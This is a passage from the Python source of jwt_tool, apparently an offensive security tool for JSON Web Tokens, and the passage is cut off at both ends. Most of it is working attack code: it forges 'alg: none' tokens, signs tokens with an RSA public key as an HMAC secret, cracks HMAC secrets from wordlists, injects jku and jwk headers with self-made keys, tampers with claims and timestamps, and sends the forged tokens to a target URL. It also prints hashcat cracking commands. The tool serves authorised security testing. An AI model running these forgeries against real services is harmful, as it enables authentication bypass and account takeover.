base URL of a Collaborator server, somewhere you can read live logs, a Request Bin etc.': None, 'httplistener': ''} 104 | config['customising'] = {'useragent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) jwt_tool', 105 | 'jwks_kid': 'jwt_tool'} 106 | config['input'] = {'wordlist': 'jwt-common.txt', 107 | 'commonHeaders': 'common-headers.txt', 108 | 'commonPayloads': 'common-payloads.txt'} 109 | config['argvals'] = {'# Set at runtime - changes here are ignored': None, 110 | 'sigType': '', 111 | 'targetUrl': '', 112 | 'cookies': '', 113 | 'key': '', 114 | 'keyList': '', 115 | 'keyFile': '', 116 | 'headerLoc': '', 117 | 'payloadclaim': '', 118 | 'headerclaim': '', 119 | 'payloadvalue': '', 120 | 'headervalue': '', 121 | 'canaryvalue': '', 122 | 'header': '', 123 | 'exploitType': '', 124 | 'scanMode': '', 125 | 'reqMode': '', 126 | 'postData': '', 127 | 'resCode': '', 128 | 'resSize': '', 129 | 'resContent': ''} 130 | with open(configFileName, 'w') as configfile: 131 | config.write(configfile) 132 | cprintc("Configuration file built - review contents of \"jwtconf.ini\" to customise your options.", "cyan") 133 | cprintc("Make sure to set the \"httplistener\" value to a URL you can monitor to enable out-of-band checks.", "cyan") 134 | exit(1) 135 | 136 | def sendToken(token, cookiedict, track, headertoken="", postdata=None): 137 | if not postdata: 138 | postdata = config['argvals']['postData'] 139 | url = config['argvals']['targetUrl'] 140 | headers = {'User-agent': config['customising']['useragent']+" "+track} 141 | if headertoken: 142 | for eachHeader in headertoken: 143 | headerName, headerVal = eachHeader.split(":",1) 144 | headers[headerName] = headerVal.lstrip(" ") 145 | try: 146 | if config['services']['proxy'] == "False": 147 | if postdata: 148 | response = requests.post(url, data=postdata, headers=headers, cookies=cookiedict, proxies=False, verify=False) 149 | else: 150 | response = requests.get(url, headers=headers, cookies=cookiedict, proxies=False, verify=False) 151 | else: 152 | proxies = {'http': 'http://'+config['services']['proxy'], 'https': 'http://'+config['services']['proxy']} 153 | if postdata: 154 | response = requests.post(url, data=postdata, headers=headers, cookies=cookiedict, proxies=proxies, verify=False) 155 | else: 156 | response = requests.get(url, headers=headers, cookies=cookiedict, proxies=proxies, verify=False) 157 | if int(response.elapsed.total_seconds()) >= 9: 158 | cprintc("HTTP response took about 10 seconds or more - could be a sign of a bug or vulnerability", "cyan") 159 | return [response.status_code, len(response.content), response.content] 160 | except requests.exceptions.ProxyError as err: 161 | cprintc("[ERROR] ProxyError - check proxy is up and not set to tamper with requests\n"+str(err), "red") 162 | exit(1) 163 | 164 | def parse_dict_cookies(value): 165 | cookiedict = {} 166 | for item in value.split(';'): 167 | item = item.strip() 168 | if not item: 169 | continue 170 | if '=' not in item: 171 | cookiedict[item] = None 172 | continue 173 | name, value = item.split('=', 1) 174 | cookiedict[name] = value 175 | return cookiedict 176 | 177 | def strip_dict_cookies(value): 178 | cookiestring = "" 179 | for item in value.split(';'): 180 | if re.search('eyJ[A-Za-z0-9_\/+-]*\.eyJ[A-Za-z0-9_\/+-]*\.[A-Za-z0-9._\/+-]*', item): 181 | continue 182 | else: 183 | cookiestring += "; "+item 184 | cookiestring = cookiestring.lstrip("; ") 185 | return cookiestring 186 | 187 | def jwtOut(token, fromMod, desc=""): 188 | genTime = datetime.now().strftime('%Y-%m-%d %H:%M:%S') 189 | idFrag = genTime+str(token) 190 | logID = "jwttool_"+hashlib.md5(idFrag.encode()).hexdigest() 191 | if config['argvals']['targetUrl'] != "": 192 | curTargetUrl = config['argvals']['targetUrl'] 193 | p = re.compile('eyJ[A-Za-z0-9_\/+-]*\.eyJ[A-Za-z0-9_\/+-]*\.[A-Za-z0-9._\/+-]*') 194 | 195 | if config['argvals']['headerloc'] == "cookies": 196 | cookietoken = p.subn(token, config['argvals']['cookies'], 0) 197 | else: 198 | cookietoken = [config['argvals']['cookies'],0] 199 | 200 | if config['argvals']['headerloc'] == "headers": 201 | headertoken = [[],0] 202 | for eachHeader in args.headers: 203 | try: 204 | headerSub = p.subn(token, eachHeader, 0) 205 | headertoken[0].append(headerSub[0]) 206 | if headerSub[1] == 1: 207 | headertoken[1] = 1 208 | except: 209 | pass 210 | else: 211 | headertoken = [[],0] 212 | if args.headers: 213 | for eachHeader in args.headers: 214 | headertoken[0].append(eachHeader) 215 | 216 | if config['argvals']['headerloc'] == "postdata": 217 | posttoken = p.subn(token, config['argvals']['postdata'], 0) 218 | else: 219 | posttoken = [config['argvals']['postdata'],0] 220 | 221 | 222 | try: 223 | cookiedict = parse_dict_cookies(cookietoken[0]) 224 | except: 225 | cookiedict = {} 226 | 227 | 228 | 229 | # Check if token was included in substitution 230 | if cookietoken[1] == 1 or headertoken[1] == 1 or posttoken[1]: 231 | resData = sendToken(token, cookiedict, logID, headertoken[0], posttoken[0]) 232 | else: 233 | if config['argvals']['overridesub'] == "true": 234 | resData = sendToken(token, cookiedict, logID, headertoken[0], posttoken[0]) 235 | else: 236 | cprintc("[-] No substitution occurred - check that a token is included in a cookie/header in the request", "red") 237 | # cprintc(headertoken, cookietoken, "cyan") 238 | exit(1) 239 | if config['argvals']['canaryvalue']: 240 | if config['argvals']['canaryvalue'] in str(resData[2]): 241 | cprintc("[+] FOUND \""+config['argvals']['canaryvalue']+"\" in response:\n"+logID + " " + fromMod + " Response Code: " + str(resData[0]) + ", " + str(resData[1]) + " bytes", "green") 242 | else: 243 | cprintc(logID + " " + fromMod + " Response Code: " + str(resData[0]) + ", " + str(resData[1]) + " bytes", "cyan") 244 | else: 245 | if 200 <= resData[0] < 300: 246 | cprintc(logID + " " + fromMod + " Response Code: " + str(resData[0]) + ", " + str(resData[1]) + " bytes", "green") 247 | elif 300 <= resData[0] < 400: 248 | cprintc(logID + " " + fromMod + " Response Code: " + str(resData[0]) + ", " + str(resData[1]) + " bytes", "cyan") 249 | elif 400 <= resData[0] < 600: 250 | cprintc(logID + " " + fromMod + " Response Code: " + str(resData[0]) + ", " + str(resData[1]) + " bytes", "red") 251 | else: 252 | if desc != "": 253 | cprintc(logID+" - "+desc, "cyan") 254 | if not args.bare: 255 | cprintc("[+] "+token, "green") 256 | else: 257 | print(token) 258 | curTargetUrl = "Not sent" 259 | additional = "[Commandline request: "+' '.join(sys.argv[0:])+']' 260 | setLog(token, genTime, logID, fromMod, curTargetUrl, additional) 261 | try: 262 | config['argvals']['rescode'],config['argvals']['ressize'],config['argvals']['rescontent'] = str(resData[0]),str(resData[1]),str(resData[2]) 263 | except: 264 | pass 265 | 266 | def setLog(jwt, genTime, logID, modulename, targetURL, additional): 267 | logLine = genTime+" | "+modulename+" | "+targetURL+" | "+additional 268 | with open(logFilename, 'a') as logFile: 269 | logFile.write(logID+" - "+logLine+" - "+jwt+"\n") 270 | return logID 271 | 272 | def buildHead(alg, headDict): 273 | newHead = headDict 274 | newHead["alg"] = alg 275 | newHead = base64.urlsafe_b64encode(json.dumps(newHead,separators=(",",":")).encode()).decode('UTF-8').strip("=") 276 | return newHead 277 | 278 | def checkNullSig(contents): 279 | jwtNull = contents.decode()+"." 280 | return jwtNull 281 | 282 | def checkAlgNone(headDict, paylB64): 283 | alg1 = "none" 284 | newHead1 = buildHead(alg1, headDict) 285 | CVEToken0 = newHead1+"."+paylB64+"." 286 | alg = "None" 287 | newHead = buildHead(alg, headDict) 288 | CVEToken1 = newHead+"."+paylB64+"." 289 | alg = "NONE" 290 | newHead = buildHead(alg, headDict) 291 | CVEToken2 = newHead+"."+paylB64+"." 292 | alg = "nOnE" 293 | newHead = buildHead(alg, headDict) 294 | CVEToken3 = newHead+"."+paylB64+"." 295 | return [CVEToken0, CVEToken1, CVEToken2, CVEToken3] 296 | 297 | def checkPubKeyExploit(headDict, paylB64, pubKey): 298 | try: 299 | key = open(pubKey).read() 300 | cprintc("File loaded: "+pubKey, "cyan") 301 | except: 302 | cprintc("[-] File not found", "red") 303 | exit(1) 304 | newHead = headDict 305 | newHead["alg"] = "HS256" 306 | newHead = base64.urlsafe_b64encode(json.dumps(headDict,separators=(",",":")).encode()).decode('UTF-8').strip("=") 307 | newTok = newHead+"."+paylB64 308 | newSig = base64.urlsafe_b64encode(hmac.new(key.encode(),newTok.encode(),hashlib.sha256).digest()).decode('UTF-8').strip("=") 309 | return newTok, newSig 310 | 311 | def injectpayloadclaim(payloadclaim, injectionvalue): 312 | newpaylDict = paylDict 313 | newpaylDict[payloadclaim] = castInput(injectionvalue) 314 | newPaylB64 = base64.urlsafe_b64encode(json.dumps(newpaylDict,separators=(",",":")).encode()).decode('UTF-8').strip("=") 315 | return newpaylDict, newPaylB64 316 | 317 | def injectheaderclaim(headerclaim, injectionvalue): 318 | newheadDict = headDict 319 | newheadDict[headerclaim] = castInput(injectionvalue) 320 | newHeadB64 = base64.urlsafe_b64encode(json.dumps(newheadDict,separators=(",",":")).encode()).decode('UTF-8').strip("=") 321 | return newheadDict, newHeadB64 322 | 323 | def tamperToken(paylDict, headDict, sig): 324 | cprintc("\n====================================================================\nThis option allows you to tamper with the header, contents and \nsignature of the JWT.\n====================================================================", "white") 325 | cprintc("\nToken header values:", "white") 326 | while True: 327 | i = 0 328 | headList = [0] 329 | for pair in headDict: 330 | menuNum = i+1 331 | if isinstance(headDict[pair], dict): 332 | cprintc("["+str(menuNum)+"] "+pair+" = JSON object:", "green") 333 | for subclaim in headDict[pair]: 334 | cprintc(" [+] "+subclaim+" = "+str(headDict[pair][subclaim]), "green") 335 | else: 336 | if type(headDict[pair]) == str: 337 | cprintc("["+str(menuNum)+"] "+pair+" = \""+str(headDict[pair])+"\"", "green") 338 | else: 339 | cprintc("["+str(menuNum)+"] "+pair+" = "+str(headDict[pair]), "green") 340 | headList.append(pair) 341 | i += 1 342 | cprintc("["+str(i+1)+"] *ADD A VALUE*", "white") 343 | cprintc("["+str(i+2)+"] *DELETE A VALUE*", "white") 344 | cprintc("[0] Continue to next step", "white") 345 | selection = "" 346 | cprintc("\nPlease select a field number:\n(or 0 to Continue)", "white") 347 | try: 348 | selection = int(input("> ")) 349 | except: 350 | cprintc("Invalid selection", "red") 351 | exit(1) 352 | if selection0: 353 | if isinstance(headDict[headList[selection]], dict): 354 | cprintc("\nPlease select a sub-field number for the "+pair+" claim:\n(or 0 to Continue)", "white") 355 | newVal = OrderedDict() 356 | for subclaim in headDict[headList[selection]]: 357 | newVal[subclaim] = headDict[pair][subclaim] 358 | newVal = buildSubclaim(newVal, headList, selection) 359 | headDict[headList[selection]] = newVal 360 | else: 361 | cprintc("\nCurrent value of "+headList[selection]+" is: "+str(headDict[headList[selection]]), "white") 362 | cprintc("Please enter new value and hit ENTER", "white") 363 | newVal = input("> ") 364 | headDict[headList[selection]] = castInput(newVal) 365 | elif selection == i+1: 366 | cprintc("Please enter new Key and hit ENTER", "white") 367 | newPair = input("> ") 368 | cprintc("Please enter new value for "+newPair+" and hit ENTER", "white") 369 | newInput = input("> ") 370 | headList.append(newPair) 371 | headDict[headList[selection]] = castInput(newInput) 372 | elif selection == i+2: 373 | cprintc("Please select a Key to DELETE and hit ENTER", "white") 374 | i = 0 375 | for pair in headDict: 376 | menuNum = i+1 377 | cprintc("["+str(menuNum)+"] "+pair+" = "+str(headDict[pair]), "white") 378 | headList.append(pair) 379 | i += 1 380 | try: 381 | delPair = int(input("> ")) 382 | except: 383 | cprintc("Invalid selection", "red") 384 | exit(1) 385 | del headDict[headList[delPair]] 386 | elif selection == 0: 387 | break 388 | else: 389 | exit(1) 390 | cprintc("\nToken payload values:", "white") 391 | while True: 392 | comparestamps, expiredtoken = dissectPayl(paylDict, count=True) 393 | i = 0 394 | paylList = [0] 395 | for pair in paylDict: 396 | menuNum = i+1 397 | paylList.append(pair) 398 | i += 1 399 | cprintc("["+str(i+1)+"] *ADD A VALUE*", "white") 400 | cprintc("["+str(i+2)+"] *DELETE A VALUE*", "white") 401 | if len(comparestamps) > 0: 402 | cprintc("["+str(i+3)+"] *UPDATE TIMESTAMPS*", "white") 403 | cprintc("[0] Continue to next step", "white") 404 | selection = "" 405 | cprintc("\nPlease select a field number:\n(or 0 to Continue)", "white") 406 | try: 407 | selection = int(input("> ")) 408 | except: 409 | cprintc("Invalid selection", "red") 410 | exit(1) 411 | if selection0: 412 | if isinstance(paylDict[paylList[selection]], dict): 413 | cprintc("\nPlease select a sub-field number for the "+str(paylList[selection])+" claim:\n(or 0 to Continue)", "white") 414 | newVal = OrderedDict() 415 | for subclaim in paylDict[paylList[selection]]: 416 | newVal[subclaim] = paylDict[paylList[selection]][subclaim] 417 | newVal = buildSubclaim(newVal, paylList, selection) 418 | paylDict[paylList[selection]] = newVal 419 | else: 420 | cprintc("\nCurrent value of "+paylList[selection]+" is: "+str(paylDict[paylList[selection]]), "white") 421 | cprintc("Please enter new value and hit ENTER", "white") 422 | newVal = input("> ") 423 | paylDict[paylList[selection]] = castInput(newVal) 424 | elif selection == i+1: 425 | cprintc("Please enter new Key and hit ENTER", "white") 426 | newPair = input("> ") 427 | cprintc("Please enter new value for "+newPair+" and hit ENTER", "white") 428 | newVal = input("> ") 429 | try: 430 | newVal = int(newVal) 431 | except: 432 | pass 433 | paylList.append(newPair) 434 | paylDict[paylList[selection]] = castInput(newVal) 435 | elif selection == i+2: 436 | cprintc("Please select a Key to DELETE and hit ENTER", "white") 437 | i = 0 438 | for pair in paylDict: 439 | menuNum = i+1 440 | cprintc("["+str(menuNum)+"] "+pair+" = "+str(paylDict[pair]), "white") 441 | paylList.append(pair) 442 | i += 1 443 | delPair = eval(input("> ")) 444 | del paylDict[paylList[delPair]] 445 | elif selection == i+3: 446 | cprintc("Timestamp updating:", "white") 447 | cprintc("[1] Update earliest timestamp to current time (keeping offsets)", "white") 448 | cprintc("[2] Add 1 hour to timestamps", "white") 449 | cprintc("[3] Add 1 day to timestamps", "white") 450 | cprintc("[4] Remove 1 hour from timestamps", "white") 451 | cprintc("[5] Remove 1 day from timestamps", "white") 452 | cprintc("\nPlease select an option from above (1-5):", "white") 453 | try: 454 | selection = int(input("> ")) 455 | except: 456 | cprintc("Invalid selection", "red") 457 | exit(1) 458 | if selection == 1: 459 | nowtime = int(datetime.now().timestamp()) 460 | timecomp = {} 461 | for timestamp in comparestamps: 462 | timecomp[timestamp] = paylDict[timestamp] 463 | earliest = min(timecomp, key=timecomp.get) 464 | earlytime = paylDict[earliest] 465 | for timestamp in comparestamps: 466 | if timestamp == earliest: 467 | paylDict[timestamp] = nowtime 468 | else: 469 | difftime = int(paylDict[timestamp])-int(earlytime) 470 | paylDict[timestamp] = nowtime+difftime 471 | elif selection == 2: 472 | for timestamp in comparestamps: 473 | newVal = int(paylDict[timestamp])+3600 474 | paylDict[timestamp] = newVal 475 | elif selection == 3: 476 | for timestamp in comparestamps: 477 | newVal = int(paylDict[timestamp])+86400 478 | paylDict[timestamp] = newVal 479 | elif selection == 4: 480 | for timestamp in comparestamps: 481 | newVal = int(paylDict[timestamp])-3600 482 | paylDict[timestamp] = newVal 483 | elif selection == 5: 484 | for timestamp in comparestamps: 485 | newVal = int(paylDict[timestamp])-86400 486 | paylDict[timestamp] = newVal 487 | else: 488 | cprintc("Invalid selection", "red") 489 | exit(1) 490 | elif selection == 0: 491 | break 492 | else: 493 | exit(1) 494 | if config['argvals']['sigType'] == "" and config['argvals']['exploitType'] == "": 495 | cprintc("Signature unchanged - no signing method specified (-S or -X)", "cyan") 496 | newContents = genContents(headDict, paylDict) 497 | desc = "Tampered token:" 498 | jwtOut(newContents+"."+sig, "Manual Tamper - original signature", desc) 499 | elif config['argvals']['exploitType'] != "": 500 | runExploits() 501 | elif config['argvals']['sigType'] != "": 502 | signingToken(headDict, paylDict) 503 | 504 | def signingToken(newheadDict, newpaylDict): 505 | if config['argvals']['sigType'][0:2] == "hs": 506 | key = "" 507 | if args.password: 508 | key = config['argvals']['key'] 509 | elif args.keyfile: 510 | key = open(config['argvals']['keyFile']).read() 511 | newSig, newContents = signTokenHS(newheadDict, newpaylDict, key, int(config['argvals']['sigType'][2:])) 512 | desc = "Tampered token - HMAC Signing:" 513 | jwtOut(newContents+"."+newSig, "Manual Tamper - HMAC Signing", desc) 514 | elif config['argvals']['sigType'][0:2] == "rs": 515 | newSig, newContents = signTokenRSA(newheadDict, newpaylDict, config['crypto']['privkey'], int(config['argvals']['sigType'][2:])) 516 | desc = "Tampered token - RSA Signing:" 517 | jwtOut(newContents+"."+newSig, "Manual Tamper - RSA Signing", desc) 518 | elif config['argvals']['sigType'][0:2] == "es": 519 | newSig, newContents = signTokenEC(newheadDict, newpaylDict, config['crypto']['ecprivkey'], int(config['argvals']['sigType'][2:])) 520 | desc = "Tampered token - EC Signing:" 521 | jwtOut(newContents+"."+newSig, "Manual Tamper - EC Signing", desc) 522 | elif config['argvals']['sigType'][0:2] == "ps": 523 | newSig, newContents = signTokenPSS(newheadDict, newpaylDict, config['crypto']['privkey'], int(config['argvals']['sigType'][2:])) 524 | desc = "Tampered token - PSS RSA Signing:" 525 | jwtOut(newContents+"."+newSig, "Manual Tamper - PSS RSA Signing", desc) 526 | 527 | def checkSig(sig, contents, key): 528 | quiet = False 529 | if key == "": 530 | cprintc("Type in the key to test", white) 531 | key = input("> ") 532 | testKey(key.encode(), sig, contents, headDict, quiet) 533 | 534 | def checkSigKid(sig, contents): 535 | quiet = False 536 | cprintc("\nLoading key file...", "cyan") 537 | try: 538 | key1 = open(config['argvals']['keyFile']).read() 539 | cprintc("File loaded: "+config['argvals']['keyFile'], "cyan") 540 | testKey(key1.encode(), sig, contents, headDict, quiet) 541 | except: 542 | cprintc("Could not load key file", "red") 543 | exit(1) 544 | 545 | def crackSig(sig, contents): 546 | quiet = True 547 | if headDict["alg"][0:2] != "HS": 548 | cprintc("Algorithm is not HMAC-SHA - cannot test against passwords, try the Verify function.", "red") 549 | return 550 | # print("\nLoading key dictionary...") 551 | try: 552 | # cprintc("File loaded: "+config['argvals']['keyList'], "cyan") 553 | keyLst = open(config['argvals']['keyList'], "r", encoding='utf-8', errors='ignore') 554 | nextKey = keyLst.readline() 555 | except: 556 | cprintc("No dictionary file loaded", "red") 557 | exit(1) 558 | # print("Testing passwords in dictionary...") 559 | utf8errors = 0 560 | wordcount = 0 561 | while nextKey: 562 | wordcount += 1 563 | try: 564 | cracked = testKey(nextKey.strip().encode('UTF-8'), sig, contents, headDict, quiet) 565 | except: 566 | cracked = False 567 | if not cracked: 568 | if wordcount % 1000000 == 0: 569 | cprintc("[*] Tested "+str(int(wordcount/1000000))+" million passwords so far", "cyan") 570 | try: 571 | nextKey = keyLst.readline() 572 | except: 573 | utf8errors += 1 574 | nextKey = keyLst.readline() 575 | else: 576 | return 577 | if cracked == False: 578 | cprintc("[-] Key not in dictionary", "red") 579 | if not args.mode: 580 | cprintc("\n===============================\nAs your list wasn't able to crack this token you might be better off using longer dictionaries, custom dictionaries, mangling rules, or brute force attacks.\nhashcat (https://hashcat.net/hashcat/) is ideal for this as it is highly optimised for speed. Just add your JWT to a text file, then use the following syntax to give you a good start:\n\n[*] dictionary attacks: hashcat -a 0 -m 16500 jwt.txt passlist.txt\n[*] rule-based attack: hashcat -a 0 -m 16500 jwt.txt passlist.txt -r rules/best64.rule\n[*] brute-force attack: hashcat -a 3 -m 16500 jwt.txt ?u?l?l?l?l?l?l?l -i --increment-min=6\n===============================\n", "cyan") 581 | if utf8errors > 0: 582 | cprintc(utf8errors, " UTF-8 incompatible passwords skipped", "cyan") 583 | 584 | def castInput(newInput): 585 | if "{" in str(newInput): 586 | try: 587 | jsonInput = json.loads(newInput) 588 | return jsonInput 589 | except ValueError: 590 | pass 591 | if "\"" in str(newInput): 592 | return newInput.strip("\"") 593 | elif newInput == "True" or newInput == "true": 594 | return True 595 | elif newInput == "False" or newInput == "false": 596 | return False 597 | elif newInput == "null": 598 | return None 599 | else: 600 | try: 601 | numInput = float(newInput) 602 | try: 603 | intInput = int(newInput) 604 | return intInput 605 | except: 606 | return numInput 607 | except: 608 | return str(newInput) 609 | return newInput 610 | 611 | def buildSubclaim(newVal, claimList, selection): 612 | while True: 613 | subList = [0] 614 | s = 0 615 | for subclaim in newVal: 616 | subNum = s+1 617 | cprintc("["+str(subNum)+"] "+subclaim+" = "+str(newVal[subclaim]), "white") 618 | s += 1 619 | subList.append(subclaim) 620 | cprintc("["+str(s+1)+"] *ADD A VALUE*", "white") 621 | cprintc("["+str(s+2)+"] *DELETE A VALUE*", "white") 622 | cprintc("[0] Continue to next step", "white") 623 | try: 624 | subSel = int(input("> ")) 625 | except: 626 | cprintc("Invalid selection", "red") 627 | exit(1) 628 | if subSel<=len(newVal) and subSel>0: 629 | selClaim = subList[subSel] 630 | cprintc("\nCurrent value of "+selClaim+" is: "+str(newVal[selClaim]), "white") 631 | cprintc("Please enter new value and hit ENTER", "white") 632 | newVal[selClaim] = castInput(input("> ")) 633 | cprintc("", "white") 634 | elif subSel == s+1: 635 | cprintc("Please enter new Key and hit ENTER", "white") 636 | newPair = input("> ") 637 | cprintc("Please enter new value for "+newPair+" and hit ENTER", "white") 638 | newVal[newPair] = castInput(input("> ")) 639 | elif subSel == s+2: 640 | cprintc("Please select a Key to DELETE and hit ENTER", "white") 641 | s = 0 642 | for subclaim in newVal: 643 | subNum = s+1 644 | cprintc("["+str(subNum)+"] "+subclaim+" = "+str(newVal[subclaim]), "white") 645 | subList.append(subclaim) 646 | s += 1 647 | try: 648 | selSub = int(input("> ")) 649 | except: 650 | cprintc("Invalid selection", "red") 651 | exit(1) 652 | delSub = subList[selSub] 653 | del newVal[delSub] 654 | elif subSel == 0: 655 | return newVal 656 | 657 | def testKey(key, sig, contents, headDict, quiet): 658 | if headDict["alg"] == "HS256": 659 | testSig = base64.urlsafe_b64encode(hmac.new(key,contents,hashlib.sha256).digest()).decode('UTF-8').strip("=") 660 | elif headDict["alg"] == "HS384": 661 | testSig = base64.urlsafe_b64encode(hmac.new(key,contents,hashlib.sha384).digest()).decode('UTF-8').strip("=") 662 | elif headDict["alg"] == "HS512": 663 | testSig = base64.urlsafe_b64encode(hmac.new(key,contents,hashlib.sha512).digest()).decode('UTF-8').strip("=") 664 | else: 665 | cprintc("Algorithm is not HMAC-SHA - cannot test with this tool.", "red") 666 | exit(1) 667 | if testSig == sig: 668 | cracked = True 669 | if len(key) > 25: 670 | cprintc("[+] CORRECT key found:\n"+key.decode('UTF-8'), "green") 671 | else: 672 | cprintc("[+] "+key.decode('UTF-8')+" is the CORRECT key!", "green") 673 | cprintc("You can tamper/fuzz the token contents (-T/-I) and sign it using:\npython3 jwt_tool.py [options here] -S "+str(headDict["alg"])+" -p \""+key.decode('UTF-8')+"\"", "cyan") 674 | return cracked 675 | else: 676 | cracked = False 677 | if quiet == False: 678 | if len(key) > 25: 679 | cprintc("[-] "+key[0:25].decode('UTF-8')+"...(output trimmed) is not the correct key", "red") 680 | else: 681 | cprintc("[-] "+key.decode('UTF-8')+" is not the correct key", "red") 682 | return cracked 683 | 684 | def getRSAKeyPair(): 685 | #config['crypto']['pubkey'] = config['crypto']['pubkey'] 686 | privkey = config['crypto']['privkey'] 687 | cprintc("key: "+privkey, "cyan") 688 | privKey = RSA.importKey(open(privkey).read()) 689 | pubKey = privKey.publickey().exportKey("PEM") 690 | #config['crypto']['pubkey'] = RSA.importKey(config['crypto']['pubkey']) 691 | return pubKey, privKey 692 | 693 | def newRSAKeyPair(): 694 | new_key = RSA.generate(2048, e=65537) 695 | pubKey = new_key.publickey().exportKey("PEM") 696 | privKey = new_key.exportKey("PEM") 697 | return pubKey, privKey 698 | 699 | def newECKeyPair(): 700 | new_key = ECC.generate(curve='P-256') 701 | pubkey = new_key.public_key().export_key(format="PEM") 702 | privKey = new_key.export_key(format="PEM") 703 | return pubkey, privKey 704 | 705 | def signTokenHS(headDict, paylDict, key, hashLength): 706 | newHead = headDict 707 | newHead["alg"] = "HS"+str(hashLength) 708 | if hashLength == 384: 709 | newContents = genContents(newHead, paylDict) 710 | newSig = base64.urlsafe_b64encode(hmac.new(key.encode(),newContents.encode(),hashlib.sha384).digest()).decode('UTF-8').strip("=") 711 | elif hashLength == 512: 712 | newContents = genContents(newHead, paylDict) 713 | newSig = base64.urlsafe_b64encode(hmac.new(key.encode(),newContents.encode(),hashlib.sha512).digest()).decode('UTF-8').strip("=") 714 | else: 715 | newContents = genContents(newHead, paylDict) 716 | newSig = base64.urlsafe_b64encode(hmac.new(key.encode(),newContents.encode(),hashlib.sha256).digest()).decode('UTF-8').strip("=") 717 | return newSig, newContents 718 | 719 | def buildJWKS(n, e, kid): 720 | newjwks = {} 721 | newjwks["kty"] = "RSA" 722 | newjwks["kid"] = kid 723 | newjwks["use"] = "sig" 724 | newjwks["e"] = str(e.decode('UTF-8')) 725 | newjwks["n"] = str(n.decode('UTF-8').rstrip("=")) 726 | return newjwks 727 | 728 | def jwksGen(headDict, paylDict, jku, privKey, kid="jwt_tool"): 729 | newHead = headDict 730 | nowtime = str(int(datetime.now().timestamp())) 731 | key = RSA.importKey(open(config['crypto']['privkey']).read()) 732 | pubKey = key.publickey().exportKey("PEM") 733 | privKey = key.export_key(format="PEM") 734 | new_key = RSA.importKey(pubKey) 735 | n = base64.urlsafe_b64encode(new_key.n.to_bytes(256, byteorder='big')) 736 | e = base64.urlsafe_b64encode(new_key.e.to_bytes(3, byteorder='big')) 737 | privKeyName = config['crypto']['privkey'] 738 | newjwks = buildJWKS(n, e, kid) 739 | newHead["jku"] = jku 740 | newHead["alg"] = "RS256" 741 | key = RSA.importKey(privKey) 742 | newContents = genContents(newHead, paylDict) 743 | newContents = newContents.encode('UTF-8') 744 | h = SHA256.new(newContents) 745 | signer = PKCS1_v1_5.new(key) 746 | try: 747 | signature = signer.sign(h) 748 | except: 749 | cprintc("Invalid Private Key", "red") 750 | exit(1) 751 | newSig = base64.urlsafe_b64encode(signature).decode('UTF-8').strip("=") 752 | jwksout = json.dumps(newjwks,separators=(",",":"), indent=4) 753 | jwksbuild = {"keys": []} 754 | jwksbuild["keys"].append(newjwks) 755 | fulljwks = json.dumps(jwksbuild,separators=(",",":"), indent=4) 756 | if config['crypto']['jwks'] == "": 757 | jwksName = "jwks_jwttool_RSA_"+nowtime+".json" 758 | with open(jwksName, 'w') as test_jwks_out: 759 | test_jwks_out.write(fulljwks) 760 | else: 761 | jwksName = config['crypto']['jwks'] 762 | return newSig, newContents.decode('UTF-8'), jwksout, privKeyName, jwksName, fulljwks 763 | 764 | def jwksEmbed(newheadDict, newpaylDict): 765 | newHead = newheadDict 766 | pubKey, privKey = getRSAKeyPair() 767 | new_key = RSA.importKey(pubKey) 768 | n = base64.urlsafe_b64encode(new_key.n.to_bytes(256, byteorder='big')) 769 | e = base64.urlsafe_b64encode(new_key.e.to_bytes(3, byteorder='big')) 770 | newjwks = buildJWKS(n, e, "jwt_tool") 771 | newHead["jwk"] = newjwks 772 | newHead["alg"] = "RS256" 773 | key = privKey 774 | # key = RSA.importKey(privKey) 775 | newContents = genContents(newHead, newpaylDict) 776 | newContents = newContents.encode('UTF-8') 777 | h = SHA256.new(newContents) 778 | signer = PKCS1_v1_5.new(key) 779 | try: 780 | signature = signer.sign(h) 781 | except: 782 | cprintc("Invalid Private Key", "red") 783 | exit(1) 784 | newSig = base64.urlsafe_b64encode(signature).decode('UTF-8').strip("=") 785 | return newSig, newContents.decode('UTF-8') 786 | 787 | def signTokenRSA(headDict, paylDict, privKey, hashLength): 788 | newHead = headDict 789 | newHead["alg"] = "RS"+str(hashLength) 790 | key = RSA.importKey(open(config['crypto']['privkey']).read()) 791 | newContents = genContents(newHead, paylDict) 792 | newContents = newContents.encode('UTF-8') 793 | if hashLength == 256: 794 | h = SHA256.new(newContents) 795 | elif hashLength == 384: 796 | h = SHA384.new(newContents) 797 | elif hashLength == 512: 798 | h = SHA512.new(newContents) 799 | else: 800 | cprintc("Invalid RSA hash length", "red") 801 | exit(1) 802 | signer = PKCS1_v1_5.new(key) 803 | try: 804 | signature = signer.sign(h) 805 | except: 806 | cprintc("Invalid Private Key", "red") 807 | exit(1) 808 | newSig = base64.urlsafe_b64encode(signature).decode('UTF-8').strip("=") 809 | return newSig, newContents.decode('UTF-8') 810 | 811 | def signTokenEC(headDict, paylDict, privKey, hashLength): 812 | newHead = headDict 813 | newHead["alg"] = "ES"+str(hashLength) 814 | key = ECC.import_key(open(config['crypto']['ecprivkey']).read()) 815 | newContents = genContents(newHead, paylDict) 816 | newContents = newContents.encode('UTF-8') 817 | if hashLength == 256: 818 | h = SHA256.new(newContents) 819 | elif hashLength == 384: 820 | h = SHA384.new(newContents) 821 | elif hashLength == 512: 822 | h = SHA512.new(newContents) 823 | else: 824 | cprintc("Invalid hash length", "red") 825 | exit(1) 826 | signer = DSS.new(key, 'fips-186-3') 827 | try: 828 | signature = signer.sign(h) 829 | except: 830 | cprintc("Invalid Private Key", "red") 831 | exit(1) 832 | newSig = base64.urlsafe_b64encode(signature).decode('UTF-8').strip("=") 833 | return newSig, newContents.decode('UTF-8') 834 | 835 | def signTokenPSS(headDict, paylDict, privKey, hashLength): 836 | newHead = headDict 837 | newHead["alg"] = "PS"+str(hashLength) 838 | key = RSA.importKey(open(config['crypto']['privkey']).read()) 839 | newContents = genContents(newHead, paylDict) 840 | newContents = newContents.encode('UTF-8') 841 | if hashLength == 256: 842 | h = SHA256.new(newContents) 843 | elif hashLength == 384: 844 | h = SHA384.new(newContents) 845 | elif hashLength == 512: 846 | h = SHA512.new(newContents) 847 | else: 848 | cprintc("Invalid RSA hash length", "red") 849 | exit(1) 850 | try: 851 | signature = pss.new(key).sign(h) 852 | except: 853 | cprintc("Invalid Private Key", "red") 854 | exit(1) 855 | newSig = base64.urlsafe_b64encode(signature).decode('UTF-8').strip("=") 856 | return newSig, newContents.decode('UTF-8') 857 | 858 | def verifyTokenRSA(headDict, paylDict, sig, pubKey): 859 | 